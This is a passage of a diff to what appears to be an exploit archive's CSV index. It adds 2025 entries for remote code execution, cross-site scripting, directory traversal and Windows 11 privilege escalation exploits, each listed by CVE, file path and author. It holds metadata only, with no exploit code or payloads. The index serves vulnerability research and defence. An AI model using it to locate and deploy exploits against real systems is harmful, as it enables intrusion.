Larholm",remote,multiple,,2007-03-06,2013-11-26,1,CVE-2007-1947;OSVDB-34122,,,,,https://www.securityfocus.com/bid/23349/info +52273,exploits/multiple/remote/52273.py,"Firefox ESR 115.11 - PDF.js Arbitrary JavaScript execution",2025-04-22,"Milad karimi",remote,multiple,,2025-04-22,2025-04-22,0,CVE-2024-4367,,,,, 37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",remote,multiple,,2015-08-19,2015-08-19,1,CVE-2015-5116,,,,,https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id 51493,exploits/multiple/remote/51493.rb,"Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)",2023-05-31,"Ege Balci",remote,multiple,,2023-05-31,2023-05-31,0,CVE-2018-8065,,,,, 34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple,,2010-08-19,2014-09-01,1,CVE-2010-3202;OSVDB-67969,,,,,https://www.securityfocus.com/bid/42556/info @@ -13124,6 +13127,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)",2019-03-28,Metasploit,remote,php,80,2019-03-28,2019-03-28,1,CVE-2019-9692,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/cmsms_showtime2_rce.rb 21334,exploits/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",remote,php,,2002-03-08,2012-09-17,1,CVE-2002-0430;OSVDB-13161,,,,,https://www.securityfocus.com/bid/4252/info 21335,exploits/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",remote,php,,2002-03-08,2012-09-17,1,CVE-2002-0430;OSVDB-13161,,,,,https://www.securityfocus.com/bid/4252/info +52272,exploits/php/remote/52272.txt,"code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)",2025-04-22,"Pruthu Raut",remote,php,,2025-04-22,2025-04-22,0,CVE-2025-28121,,,,, 46698,exploits/php/remote/46698.rb,"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)",2019-04-15,AkkuS,remote,php,,2019-04-15,2021-03-18,1,CVE-2019-11447,"Metasploit Framework (MSF)",,,http://www.exploit-db.comcutenews.2.1.2.zip, 24444,exploits/php/remote/24444.rb,"DataLife Engine - 'preview.php' PHP Code Injection (Metasploit)",2013-02-01,Metasploit,remote,php,,2013-02-01,2013-02-01,1,CVE-2013-7387;OSVDB-89662;CVE-2013-1412,"Metasploit Framework (MSF)",,,http://www.exploit-db.comDataLife_Engine_9.7_Win-1251_Final_English_By_DLEVIET_22.11.2012.rar, 31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,,2014-02-16,2014-02-16,1,OSVDB-103387,"Metasploit Framework (MSF)",,,, @@ -13310,6 +13314,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28407,exploits/php/remote/28407.rb,"Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)",2013-09-20,xistence,remote,php,,2013-09-20,2017-04-01,1,OSVDB-97615,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt28500/screen-shot-2013-09-22-at-42116-pm.png,, 43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,,2017-12-18,2017-12-18,1,CVE-2017-17560,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/c6a2ae2551af262e42c9b14ac3d212c978f7dbf2/modules/exploits/linux/http/wd_mycloud_multiupload_upload.rb 40004,exploits/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,remote,php,80,2016-06-22,2016-06-22,0,CVE-2015-6567;CVE-2015-6568,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwolfcms-0.8.1.tar.gz, +52271,exploits/php/remote/52271.py,"WonderCMS 3.4.2 - Remote Code Execution (RCE)",2025-04-22,"Milad karimi",remote,php,,2025-04-22,2025-04-22,0,CVE-2023-41425,,,,, 46662,exploits/php/remote/46662.rb,"WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80,2019-04-05,2019-04-05,1,CVE-2019-8943;CVE-2019-8942,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/wp_crop_rce.rb 23856,exploits/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,remote,php,,2013-01-03,2013-01-03,1,OSVDB-87353,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51037/ 23856,exploits/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,remote,php,,2013-01-03,2013-01-03,1,OSVDB-87353,"WordPress Plugin",,,,http://secunia.com/advisories/51037/ @@ -33062,6 +33067,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47557,exploits/php/webapps/47557.txt,"WordPress Core 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,,2019-10-29,2019-12-21,0,,,,,, 47720,exploits/php/webapps/47720.txt,"WordPress Core 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,,2019-11-28,2019-12-21,0,,,,,, 50663,exploits/php/webapps/50663.txt,"WordPress Core 5.8.2 - 'WP_Query' SQL Injection",2022-01-13,"Aryan Chehreghani",webapps,php,,2022-01-13,2022-01-13,0,CVE-2022-21661,,,,, +52274,exploits/php/webapps/52274.py,"WordPress Core 6.2 - Directory Traversal",2025-04-22,"Milad karimi",webapps,php,,2025-04-22,2025-04-22,0,CVE-2023-2745,,,,, 29754,exploits/php/webapps/29754.html,"WordPress Core < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",webapps,php,,2007-03-19,2017-05-04,1,CVE-2007-1622;OSVDB-34348,,,,http://www.exploit-db.comWordPress-2.1.2.zip,https://www.securityfocus.com/bid/23027/info 10089,exploits/php/webapps/10089.txt,"WordPress Core < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",webapps,php,,2009-11-10,2017-05-04,1,CVE-2009-3890;OSVDB-59958,,,,http://www.exploit-db.comwordpress-2.8.5.tar.gz, 41497,exploits/php/webapps/41497.php,"WordPress Core < 4.7.1 - Username Enumeration",2017-03-03,Dctor,webapps,php,,2017-03-03,2017-05-04,0,CVE-2017-5487,,,,http://www.exploit-db.comwordpress-4.7.1.zip, @@ -41266,6 +41272,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817 51946,exploits/windows/local/51946.rb,"Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation",2024-04-02,"E1 Coders",local,windows,,2024-04-02,2024-04-02,0,CVE-2024-21338,,,,, 51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,, +52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,, +52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,, 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,, 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,